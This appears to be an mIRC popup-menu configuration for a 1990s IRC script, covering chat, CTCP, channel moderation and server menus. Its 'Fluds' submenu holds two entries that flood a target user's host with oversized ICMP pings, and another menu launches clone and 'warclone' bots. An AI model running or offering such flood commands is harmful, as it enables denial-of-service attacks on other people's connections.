[mPopup]
n0=SeNGenHoV v1.6 (dev).:/echo 3 -s You are running %script3
n1=-
n2=Server
n3=.Lusers:/lusers
n4=.Motd:/motd
n5=.Time:/time
n6=.Jump:/jump $?="Enter server and port (default 6667)"
n7=.Links:/links
n8=.Stats
n9=..K-lines:/stats k $?="Enter server name (or cancel)"
n10=..Operators:/trace $?="Enter server name (or cancel)"
n11=..O-lines:/stats o $?="Enter server name (or cancel)"
n12=.Users
n13=..Users on IRC from host?:/who *. $+ $$?="Enter host to search:"
n14=..Users from your domain:/who %domain
n15=..Users from ?:/who * $+ $$?="Enter domain:"
n16=User
n17=.User Mode:/mode $me $$?="Enter your new user mode"
n18=.User Invisible:/mode $me +i
n19=.UCentral:/uwho $$?="Enter who you want to UCentral"
n20=User
n21=.User Mode:/mode $me $$?="Enter your new user mode"
n22=.User Invisible:/mode $me +i
n23=.UCentral:/uwho $$?="Enter who you want to UCentral"
n24=Other
n25=.Log
n26=..Check Log:/log read
n27=..Erase Log:/log erase
n28=.Pager
n29=..Check Pager:/run notepad.exe %locpager
n30=..Erase Pager:/write -c %locpager Pager Sheet:  for %owner %script2 | /write -i %locpager | /echo 5 -s %script4 Erased Pager sheet.
n31=.Whois ?:/whois $$?="Enter a nickname:"
n32=.Query:/query $$?="Enter a nickname:"
n33=-
n34=;rem --------->  Personal Edition begins
n35=EggLink Control:
n36=.Information:
n37=..Egglink Status:/eggstatus
n38=.Link
n39=..Start Egglink:/eggscan
n40=..Link to bot (eggcon):/eggcon
n41=..Close EggLink:/eggclose
n42=;rem ----------> Personal Edition ended
n43=-
n44=Text File
n45=.Edit Notes:/run %locnotes
n46=.Edit script:/run notepad.exe %locini
n47=.New:/run notepad.exe
n48=.Load:/run notepad.exe $$dir="Select a text file" %lochome
n49=Run
n50=.File Manager:/run winfile.exe
n51=.Notepad:/run notepad.exe
n52=.SuperPad:/run spad.exe
n53=.Write:/run write.exe
n54=.Load:/set %q2 $$dir="Enter program:" c:\*.* | /run  %q2 $?="Enter parameters (optional):" $dir="Enter file (optional):" c:\*.* | /unset %q2
n55=Help
n56=.Read readme:/run %locreadme
n57=.Read manual:/run %lochelp
n58=Goodbye
n59=.quit (SeNGeNHoV):/quit %script3
n60=.Quittime:/quittime
n61=.quit (sunday):/quit ...everyday is like sunday ...
n62=.quit (monday):/quit ...just another manic monday...
n63=.quit (beeker st.):/quit ...smiling faces try to understand, i saw a shadow touch a shadows hand...
n64=.quit (email):/quit EMAIL: %email
n65=.quit ?:/quit $$?="Enter quit message" %script4
n66=.Leave:/part # see you later
n67=.brb:/quit doh!!   . . . brb

[qPopup]
n0=SeNGenHoV v1.6:/me is running %script3
n1=-
n2=UCentral:/uwho $$1
n3=Whois:/whois $$1
n4=Query:/query $$1
n5=CTCP
n6=.Ping:/ctcp $$* ping
n7=.Ping Reply:/me [ $+ $$1 PING REPLY $++ ] = $$?="Enter the time" secs
n8=.Echo:/ctcp $$* echo
n9=.Finger:/ctcp $$* finger
n10=.Version:/ctcp $$* version
n11=.Time:/ctcp $$* time
n12=.Userinfo:/ctcp $$* userinfo
n13=.ClientInfo:/ctcp $$* clientinfo
n14=.Script:/ctcp $$* script
n15=.Halibut:/ctcp $$* halibut
n16=.Trout:/ctcp $$* trout
n17=.Page:/ctcp $$* page
n18=.General CTCP:/ctcp $$* $$?="What do you want to ctcp them?"
n19=DCC
n20=.Send:/dcc send $$1
n21=.Chat:/dcc chat $$1
n22=Invite
n23=.Invite #blueroom:/invite $$1 #blueroom
n24=.Invite ?:/invite $$1 $$?="Which channel?"
n25=Notify
n26=.Add:/.notify $$1 $?="Their note?"
n27=.Remove:/.notify -r $$1
n28=-
n29=Action Messages
n30=.Hello:/me waves hello to $$1
n31=.Jumping Hello:/me jumps up and down, "woohoo! $$1's here"
n32=.Sing:/me sings " $+ $$?="Please enter what you want to sing" $++ "
n33=.Group Hug:/me gives everyone a giant hug
n34=.Kiss:/me gives $$1 a giant sloppy kiss
n35=.Hug:/me gives $$1 a giant hug
n36=.Beat:/me beats $$1 with a $$?="Please enter what you want to beat them with"
n37=.Block Door:/me blocks the door and refuses to let $$1 leave
n38=.Bye:/me waves goodbye to $$1
n39=.Lagmonster:/me goes off to thrash the horrible lag monster | /me will be back shortly (i hope)
n40=.Tearful Bye:/me wipes the tears from his eyes wondering when hell see $$1 again
n41=.Bye All:/me waves so long to everyone
n42=.Innocent:/me gives $$1 an innocent look
n43=Action Messages (2)
n44=.Silly Stuff
n45=..moby:/me jumps up and dances crazily about his room to the tripnotic rhythms of evil ninja moby
n46=..silentbob:/me holds up a sign for Silent Bob that says "Jay is $$?="What does Silent Bob have Jay do?" over there---->"
n47=..popups:/me chuckles, "popups rule . . . "  :)
n48=..Pings
n49=...take that you feind!!:/notice $$1 take that you feind!!!! | /ping $$1
n50=...eat my ping:/notice $$1 eat my ping!!!! | /ping $$1

[cPopup]
n0=SeNGenHoV v1.6 (dev).:/me is running %script3
n1=-
n2=Server
n3=.Lusers:/lusers
n4=.Motd:/motd
n5=.Time:/time
n6=.Jump:/jump $?="Enter server and port (default 6667)"
n7=.Links:/links
n8=.Stats
n9=..K-lines:/stats k $?="Enter server name (or cancel)"
n10=..Operators:/trace $?="Enter server name (or cancel)"
n11=..O-lines:/stats o $?="Enter server name (or cancel)"
n12=.Users
n13=..Users on IRC from host?:/who *. $+ $$?="Enter host to search:"
n14=..Users from your domain:/who %domain
n15=..Users from ?:/who * $+ $$?="Enter domain:"
n16=User
n17=.User Mode:/mode $me $$?="Enter your new user mode"
n18=.User Invisible:/mode $me +i
n19=.UCentral:/uwho $$?="Enter who you want to UCentral"
n20=.Invite User:/invite $$?="Invite who?" #
n21=Channel
n22=.Names
n23=..#blueroom:/names #blueroom
n24=..names ?:/names #$$?="Enter a channel name:"
n25=.Join
n26=..#blueroom:/join #blueroom
n27=..join ?:/join #$$?="Enter a channel to join:"
n28=..join passworded:/join #$$?="Enter a channel to join:" $?="Enter the password:"
n29=.ChanOP Chat
n30=..OpNotice:/opnot $$?="Enter Notice to send to all operators on this channel:"
n31=..Message to Ops:/opmsg $$?="Message to send all operators on this channel:"
n32=.Channel Setup
n33=..Topic:/topic # $$?="Enter the new topic"
n34=..Setup room (+tn):/mode # +t | /mode # +n | /topic # $$?="Enter the new topic:"
n35=..Setup room (+stn):/mode # +stn | /topic # $$?="Enter new topic:"
n36=..Hidden Channel
n37=...Setup Hidden room:/mode # +smitn | /mode # +k %hidpass | /topic # SeCReT: no invites w/o permission of a chanop
n38=...De-hide room:/mode # -smi | /mode # -k %hidpass | /topic #  un-hidden ... for now
n39=..Mode:/mode # $$?="Please enter new mode"
n40=..Keyword:/mode # +k $$?="Please enter keyword:"
n41=.Channel Aways
n42=..MsgAway?:/saway away $?="Enter what you are away doing:"
n43=..Change Away msg:/away $$?="What are you away doing?" %script4
n44=..TimedAway:/saway timed $?="Enter what you are away doing:"
n45=..MsgBack:/saway back
n46=.Leave
n47=..Many windows:/me tries to keep his head up ... | /msg # too ... many ... windooooooows .... | /msg # bbl | /leave #
n48=..You all suck:/me screams in frustration! | /msg # you all suck! | /leave #
n49=Other
n50=.Log
n51=..Check Log:/log read
n52=..Erase Log:/log erase
n53=.Pager
n54=..Check Pager:/run notepad.exe %locpager
n55=..Erase Pager:/write -c %locpager Pager Sheet:  for %owner %script2 | /write -i %locpager | /echo 5 -s %script4 Erased Pager sheet.
n56=.Whois ?:/whois $$?="Enter a nickname:"
n57=.Query:/query $$?="Enter a nickname:"
n58=-
n59=;rem --------->  Personal Edition begins
n60=EggLink Control:
n61=.Information:
n62=..EggLink Status:/eggstatus
n63=.Link
n64=..Start Egglink:/eggscan
n65=..Link to bot (eggcon):/eggcon
n66=..Close EggLink:{
n67=  echo 5 -s %script4 Breaking EggLink connection ...
n68=  if (%eggconnect != yes) {
n69=    echo 5 -s %script4 ERROR!!!  EggLink not active.
n70=    halt
n71=  }
n72=  .msg %eggnick .quit
n73=  .timer957 off
n74=  .timer 1 3 /close -c %eggname
n75=  .set %eggconnect no
n76=}
n77=;rem ----------> Personal Edition ended
n78=-
n79=Text File
n80=.Edit Notes:/run %locnotes
n81=.Edit script:/run notepad.exe %locini
n82=.New:/run notepad.exe
n83=.Load:/run notepad.exe $$dir="Select a text file" %lochome
n84=Run
n85=.File Manager:/run winfile.exe
n86=.Notepad:/run notepad.exe
n87=.SuperPad:/run spad.exe
n88=.Write:/run write.exe
n89=.Load:/set %q2 $$dir="Enter program:" c:\*.* | /run  %q2 $?="Enter parameters (optional):" $dir="Enter file (optional):" c:\*.* | /unset %q2
n90=Help
n91=.Read readme:/run %locreadme
n92=.Read manual:/run %lochelp
n93=Goodbye
n94=.quit (SeNGeNHoV):/quit %script3
n95=.Quittime:/quittime
n96=.quit (sunday):/quit ...everyday is like sunday ...
n97=.quit (monday):/quit ...just another manic monday...
n98=.quit (beeker st.):/quit ...smiling faces try to understand, i saw a shadow touch a shadows hand...
n99=.quit (email):/quit EMAIL: %email
n100=.quit ?:/quit $?
n101=.Leave:/part # see you later
n102=.brb:/quit doh!!   . . . brb

[lPopup]
n0=SeNGenHoV v1.6 alpha:/me is running %script3
n1=-
n2=Whois:/whois $$*
n3=Query:/query $$1
n4=UCentral:/uwho $1
n5=Reply:/r $$1 $$?="Enter your message:"
n6=-
n7=Control
n8=.Give Ops:/o $$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 $20 $21 $22 $23 $24 $25 $26 $27 $28 $29 $30 $31 $32 $33 $34
n9=.Give Voice:/mode # +vvv $$1 $2 $3
n10=.Deop:/dop $$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 $20 $21 $22 $23 $24 $25 $26 $27 $28 $29 $30 $31 $32 $33 $34
n11=.Take voice:/mode # -vvv $$1 $2 $3
n12=.OpProtect Kick:/timer 1 5 /kick # $$1 ILLEGAL KICK/BAN of OpProtected User %script1 | /ctcp %sengnick opprotect $$1
n13=.ScrewBan:/sban $$1
n14=.Kicks/Bans
n15=..Quick Kick:/kick # $$1 %script4 *** %banmsg
n16=..Ban:/ban $$1 2
n17=..Quick Kick, Ban:/ban $$1 2 | /kick # $$1 %script4 *** %banmsg
n18=..Kick (w/ reason):/kick # $$1 $$?="Tell them why they are lame:" %script4
n19=..Kick/Ban (w/ reason):/ban $$1 2 | /kick # $$1 $$?="Tell them why they are lame:" ---> %script4
n20=..MassKick:/kick # $$* MaSS KiCk -- %mkick %script4 
n21=..MassKick/Ban:/ban # $$* | /kick # $$*
n22=..Ban AOL:/mode # +b *!*@*.aol.com
n23=.User Levels
n24=..Auto-Op
n25=...Add:/auto $$1 # 3
n26=...Remove:/auto -r $$1 # 3
n27=..User 600 (SHiTLiSTeD):/ctcp %sengnick shitlist $$1 | /ruser $$1 3 | /ruser $$1 | /timer 1 4 /guser =600 $$1 3 | /echo 3 -s $$1 has been SHITLISTED on both %owner and %sengnick | /shitlist $$1
n28=..User Op-Protection
n29=...Add:/protect $$1 #
n30=...Remove:/protect -r $$1 #
n31=..UnRevenge:/ruser =500 $$1 3
n32=..PrivMsg User:
n33=...Add:/guser 100 $$1 3
n34=...Remove:/guser 100 $$1 3
n35=User
n36=.msg:/msg $$1 $$?="What do you want to msg them?"
n37=.Notice:/notice $$1 $$?="Enter your message"
n38=.dns:/dns $$1
n39=.Fluds
n40=..ICMP echo request (win95): {
n41=  unset %icmpech*
n42=  set %icmpechname $address($$1,2)
n43=  set %icmpechname $remove(%icmpechname,*!*@)
n44=  if (%icmpechname == $null) {
n45=    echo 5 -s %script4 cannot resolve hostname ... :(
n46=    halt
n47=  }
n48=  else {
n49=    run ping -n 600 -l 40000 %icmpechname
n50=    echo 5 -s %script4 ICMP echo fludding %icmpechname (packets: 600, length: 40000)
n51=    echo 5 -s Press control-c in the dos window to halt.
n52=    unset %icmpech*
n53=    halt
n54=  }
n55=}
n56=..ICMP echo (invalid length): {
n57=  unset %icmpinv*
n58=  set %icmpinvname $address($$1,2)
n59=  set %icmpinvname $remove(%icmpinvname,*!*@)
n60=  if (%icmpinvname == $null) {
n61=    echo 5 -s %script4 cannot resolve hostname ... :(
n62=    halt
n63=  }
n64=  else {
n65=    run ping -n 600 -l 65525 %icmpinvname
n66=    echo 5 -s %script4 ICMP echo fludding %icmpinvname (packets: 600, length: 65525)
n67=    echo 5 -s Press control-c in the dos window to halt.
n68=    unset %icmpinv*
n69=    halt
n70=  }
n71=}
n72=.Notify
n73=..Notify:/notify $$1 $?="Special Note:"
n74=..Remove:/notify -r $$1
n75=.Set to PrivMsg User:/writeini %locini private_message address $address($$1,3) | /echo 5 -s %script4 Private_Message user has been identified as $$1 ... rehashing. | /timer 1 3 /init
n76=.ignore
n77=..nick ignore:/ignore $$*
n78=..ignore (*!*user@*.host):/ignore $$* 3
n79=..global ignore (250):/ignore -u250 *!*@*
n80=..remove ignore:/ignore -r $$* 3
n81=..remove global:/ignore -r *!*@*
n82=.Invite
n83=..Invite #blueroom:/invite $$1 #blueroom
n84=..Invite #andoria:/invite$$1 #andoria
n85=..Invite ?:/invite $$1 $$?="What channel"
n86=..Invite to Hidden Channel:/notice $$1 keyword for %script1 Hidden Channel  is %hidpass | /invite $$1 $$?="Enter channel name" | 
n87=CTCP
n88=.Ping:/ctcp $$* ping
n89=.Ping Reply:/me ( $+ $$1 PING REPLY $++ ) = $$?="Enter the time" secs
n90=.Echo:/ctcp $$* echo $?="What do you want them to echo?"
n91=.Finger:/ctcp $$* finger
n92=.Version:/ctcp $$* version
n93=.Time:/ctcp $$* time
n94=.Userinfo:/ctcp $$* userinfo
n95=.ClientInfo:/ctcp $$* clientinfo
n96=.Script:/ctcp $$* script
n97=.Halibut:/ctcp $$* halibut
n98=.Trout:/ctcp $$* trout
n99=.Page:/ctcp $$* page
n100=.MsgPage:/ctcp $$1 page $?="What would you like the page to read?"
n101=.General CTCP:/ctcp $$* $$?="What do you want to ctcp them?"
n102=DCC
n103=.Send:/dcc send $$1
n104=.Chat:/dcc chat $$1
n105=Channel
n106=.Topic:/topic # $$?
n107=.Mode:/mode # $$?="Please enter new mode"
n108=-
n109=ri0n's personal action collection:/echo 3 -s %script2 includes a small action collection ... these can be easily edited and added to.  Read mIRC help files, and the %script1 help files and manual.
n110=-
n111=Action Messages
n112=.Hello:/me waves hello to $$1
n113=.Jumping Hello:/me jumps up and down, "woohoo! $$1's here"
n114=.Sing:/me sings " $+ $$?="Please enter what you want to sing" $++ "
n115=.Group Hug:/me gives everyone a giant hug
n116=.Kiss:/me gives $$1 a giant sloppy kiss
n117=.Hug:/me gives $$1 a giant hug
n118=.Beat:/me beats $$1 with a $$?="Please enter what you want to beat them with"
n119=.Block Door:/me blocks the door and refuses to let $$1 leave
n120=.Bye:/me waves goodbye to $$1
n121=.Lagmonster:/me goes off to thrash the horrible lag monster | /me will be back shortly (i hope)
n122=.Tearful Bye:/me wipes the tears from his eyes wondering when hell see $$1 again
n123=.Bye All:/me waves so long to everyone
n124=.Innocent:/me gives $$1 an innocent look
n125=.Tickle
n126=..female:/me tickles $$1 till she cant breathe
n127=..male:/me tickles $$1 till he cant breathe
n128=Action Messages (2)
n129=.Entrances
n130=..Break In:/me breaks down the door and smiles, proclaiming, " $+ $$?="What do you wish to proclaim, master?" $++ "
n131=..Eat My Justice!:/me grins and proclaims, "Eat my Justice, Wrongdoers!!!"
n132=..Hug Entrance:/me leaps through the door and hugs all of his happy netfriends
n133=.Silly Stuff
n134=..moby:/me jumps up and dances crazily about his room to the tripnotic rhythms of evil ninja moby
n135=..silentbob:/me holds up a sign for Silent Bob that says "Jay is $$?="What does Silent Bob have Jay do?" over there---->"
n136=..popups:/me chuckles, "popups rule . . . "  :)
n137=..konfusion:/me looks konfused ... | /say dogs?? fries?? cheese??
n138=..Pings
n139=...take that you feind!!:/notice $$1 take that you feind!!!! | /ctcp $$1 ping
n140=...eat my ping:/notice $$1 eat my ping!!!! | /ctcp $$1 ping
n141=..Kazoo?!
n142=...Kazoo?!:/me plays a tune for $$1 on a tiny kazoo
n143=...kazoo?! (2):/me grabs his trusty kazoo and lifts a wonderous tune to the air for $$1
n144=...tooting kazoo?!:/me walks about the # happily tooting on his kazoo
n145=.Power Kicks
n146=..skyscraper:/me bumps $$1 and he falls off of the roof of the building ... oops! | /say  $$1 splatters nastily on the ground |  /timer 1 3 /kick # $$1 you're a loooooooozer! | /notice $$1 lamerz stay out!
n147=..mini-gun:/me grabs his minigun and looks around for his victim | /me sights $$1 in the distance and turns towards that direction | /say the last thing $$1 hears is the click of $me pulling the trigger back | /timer 1 3 /kick # $$1 you're a loooooooozer! | /timer 1 4 /notice $$1 lamerz stay out!
n148=.Power Kicks/Bans
n149=..skyscraper:/me bumps $$1 and he falls off of the roof of the building ... oops! | /say  $$1 splatters nastily on the ground | /ban $$1 3 | /timer 1 3 /kick # $$1 you're a loooooooozer! | /notice $$1 lamerz stay out!
n150=..Timed Bans
n151=...30 sec timer:/me thinks the # gods are displeased with $$1 | /mode # -o $$1 | /say for really being an ass $$1 is banned from # for 30 seconds | /me flips the 30 second ban switch | /mode # +b $$1 | /timer 1 3 /kick # $$1 30 sec ban --- you may re-join in 30 seconds | /timer 1 30 /mode # -b $$1
n152=...15 sec timer:/me thinks the # gods are displeased with $$1 | /mode # -o $$1 | /say for being an ass $$1 is banned from # for 15 seconds | /me flips the 15 second ban switch | /mode # +b $$1 | /timer 1 3 /kick # $$1 15 sec ban --- you may re-join in 15 seconds | /timer 1 15 /mode # -b $$1
n153=.Misc
n154=..wherefrom?:/me is from %home
n155=..age/sex?:/me checks .... | /timer 1 3 /say phew ... hehe | /timer3 1 4 /me is %agesex 
n156=..laffs:/me laffs
n157=..blushes:/me blushes
n158=..turn red:/me turns bright red
n159=..gulps:/me gulps loudly
n160=..cries:/me cries
n161=..smiles:/me smiles
n162=..frowns:/me frowns
n163=..brightens:/me brightens
n164=..hides:/me runs and hides
n165=..yawns:/me yawns ...
n166=..tired:/me is very tired
n167=..time:/me looks at his watch ... it is $fulldate

[bPopup]
n0={SHV v1.6}
n1=Connect:/con
n2=Rehash:/rehash script
n3=Processes
n4=.List:/proc
n5=.Killproc:/killproc $$?="Enter process number"
n6=.Info
n7=Commands
n8=.NickGet:/.timer88 0 15 /getnick | /echo 5 -s %script4 Running NickGet
n9=.Status:/status
n10=.LagCheck:
n11=Help
n12=.Mirc Help:/help
n13=.Mirc help index?:/help $?="Enter topic:"
n14=.Script Help:/shelp $?="Enter topic"
n15=-
n16=Clones
n17=.launch clonebot:/run %locclone | /.timer 1 10 /dde %ddeclone command "" /connect
n18=.launch warclone:/run %locwarcln
n19=Servers 
n20=.NEWnet
n21=..irc.stealth.net:/server irc.stealth.net $?="6665-6667:"
n22=..irc.pitt.edu:/server irc.pitt.edu
n23=..irc.winternet.com:/server irc.winternet.com $?="7000-7???:"
n24=.GalaxyNET
n25=..irc.winternet.com:/server irc.winternet.com $?="6665-6667:"
n26=.EFNet
n27=..irc2.blackened.com:/server irc2.blackened.com $?="Ports 6665-6668"
n28=..irc.cris.com:/server irc.cris.com $?="6665-6667:"
n29=..irc.visi.com:/server irc.visi.com $?="Port 6664-6667:"
n30=..irc.mcs.net:/server irc.mcs.net $?="6666-6668:"
n31=..irc.frontiernet.net:/server irc.frontiernet.net $?="6666-6668:"
n32=..irc.ais.net:/server irc.ais.net $?="Enter port; Ports available; 6660-6680:"
n33=..irc.gate.net:/server irc.gate.net $?="6665-6667:"
n34=..irc.neosoft.com:/server irc.neosoft.com $?="6665-6680:"
n35=..irc.primenet.com:/server irc.primenet.com $?="6665-6667:"
n36=..irc.epix.net:/server irc.epix.net $?="6665-6667:"
n37=..irc2.epix.net:/server irc2.epix.net $?="6665-6667:"
n38=..irc.portal.com:/server irc.portal.com
n39=..irc.mo.net:/server irc.mo.net $?="6665-6668:"
n40=..irc.spyder.org:/server irc.spyder.org $?="Enter Port; Ports Available; 6660-6669:"
n41=..irc.cerf.net:/server irc.cerf.net $?="Enter Port; Ports Available; 6660-6669:"
n42=..irc3.ais.net:/server irc3.ais.net $?="Enter Port; 6650-6680:"
n43=..anarchy.tamu.edu:/server anarchy.tamu.edu 
n44=..organ.ctr.columbia.edu:/server organ.ctr.columbia.edu
n45=..irc.bridge.net:/server irc.bridge.net 
n46=..opus.bridge.net:/server opus.bridge.net
n47=..irc2.magic.ca:/server irc2.magic.ca
n48=..portal gateway:/server irc.portal.com 9998
n49=.DALnet
n50=..Misc server:/server irc.dal.net
n51=..glass.dal.net:/server glass.dal.net 7000
n52=..skypoint.mn.us.dal.net:/server skypoint.mn.us.dal.net 7000
n53=..davis.ca.us.dal.net:/server davis.ca.us.dal.net 7000
n54=..uncc.nc.us.dal.net:/server uncc.nc.us.dal.net 7000 
n55=..cin.il.us.dal.net:/server cin.il.us.dal.net 7000
n56=..xanth.ma.us.dal.net:/server xanth.ma.us.dal.net 7000
n57=..xgw.fi.dal.net:/server xgw.fi.dal.net 7000
n58=..services.dal.net:/server services.dal.net 7000
n59=..mindijari.ca.us.dal.net:/server mindijari.ca.us.dal.net 7000
n60=..groucho.ca.us.dal.net:/server groucho.ca.us.dal.net 7000
n61=.Undernet
n62=..undernet.org:/server undernet.org
n63=..Phoenix:/server Phoenix.AZ.us.undernet.org 6667 
n64=..Manhattan:/server Manhattan.KS.US.UnderNet.org 6668 
n65=..LowellMA:/server Lowell.ma.us.undernet.org 6667 
n66=..DC:/server Washington.DC.us.undernet.org 6667 
n67=..AustinTX:/server Austin.TX.us.undernet.org 6667 
n68=-
n69=Switches
n70=.Op/Kick Protection
n71=..Enable OpProtect:/.protect on | /echo 3 -s %script4 OpProtect has been turned ON ... good thinking muchacho!
n72=..Disable OpProtect:/.protect off | /echo 3 -s %script4 OpProtect has been turned OFF ... what are ya nuts?!?!?!
n73=.Shitlist
n74=..Enable SHITLIST:/.enable #shitlist | /echo 3 -s %script4 SHITLIST has been turned on ... good idea. :)
n75=..Disable SHITLIST:/.disable #shitlist | /echo 3 -s %script4 SHITLIST has been turned off ... what the hell are you doing?!?!?!
n76=.Logging
n77=..Enable Logging:/.enable #msglog | /echo 3 -s %script4 Msg Log has been turned ON. | /set %msglognumb 0 | /set %msglogact 1
n78=..Disable Logging:/.disable #msglog | /echo 3 -s %script4 Msg Log has been turned OFF. | /echo 5 -s %script4 MsgLog has recieved %msglognumb messages ... | /set %msglognumb 0 | /set %msglogact 0
n79=..Loggng Status:/ame has MsgLog turned: %log %script4
n80=.Pager
n81=..Enable pager:/set -q %pg ON | /.enable #pageron | /.disable #pageroff | /echo 3 -s %script2 PAGER has been turned ON. | /ame has his PAGER: %pg $+ .  Send in format /ctcp nick page [message] %script4 | /set %pageract 1
n82=..Disable pager:/set -q %pg OFF | /.disable #pageron | /.enable #pageroff | /echo 3 -s %script2 PAGER has been turned OFF. | /ame has his PAGER: %pg $+ . %script4 | /set %pageract 0
n83=.Auto-Op:
n84=..Enable:/echo 5 -s %script4 Auto-Ops have been turned on. | /.auto on
n85=..Disable:/echo 5 -s %script4 Auto-Ops have been turned off. | /.auto off
n86=.JoinScan:
n87=..Enable:/.enable #channelscan | /echo 5 -s %script4 JoinScan has been turned ON.
n88=..Disable:/.disable #channelscan | /echo 5 -s %script4 JoinScan has been turned OFF.
n89=.FludProts
n90=..Enable (all):/modini fludprots fludprot_enable 1 | /modini fludprots ctcpfludprot_enable 1 | /modini fludprots msgfludprot_enable 1 | /modini fludprots fludmax_enable 1 | /init
n91=..Disable (all):/modini fludprots fludprot_enable 0 | /modini fludprots fludmax_enable 0 | /init
n92=..Enable CTCP:/modini fludprots ctcpfludprot_enable 1 | /init
n93=..Disable CTCP:/modini fludprots ctcpfludprot_enable 0 | /init
n94=..Enable Msg:/modini fludprots msgfludprot_enable 1 | /init
n95=..Disable Msg:/modini fludprots msgfludprot_enable 0 | /init
n96=..MaxFlud On:/modini fludprots fludmax_enable 1 | /init
n97=..MaxFlud Off:/modini fludprots fludmax_enable 0 | /init
n98=.Private Message
n99=..Enable message:/enable #privmess | /echo 3 -s %script4 the Private Message join messages have been turned ON
n100=..Disable message:/disable #privmess | /echo 3 -s %script4 the Private Message join messages have been turnes OFF
n101=..re-set message:/set -q %pmsg $$?="Please enter your message" | /writeini %locini private_message message $$! | /echo 5 -s %script4 Private Message now reads: $$! | /echo -s $cr
n102=..re-set name:/set -q %pmname $$?="Please enter the user's name" | /writeini %locini private_message name $$! | /echo 5 -s %script4 Private Message name set to: $$! | /echo -s $cr
n103=-
n104=Configuration
n105=.Modini:/modini $$?="Enter Section:" $$?="Enter Item:" $?="Enter value (or cancel to remove):"
n106=.Edit script:/run %locini
n107=.Load Plug-In:/plugin $dir="Select plugin initialize script" %locplugin
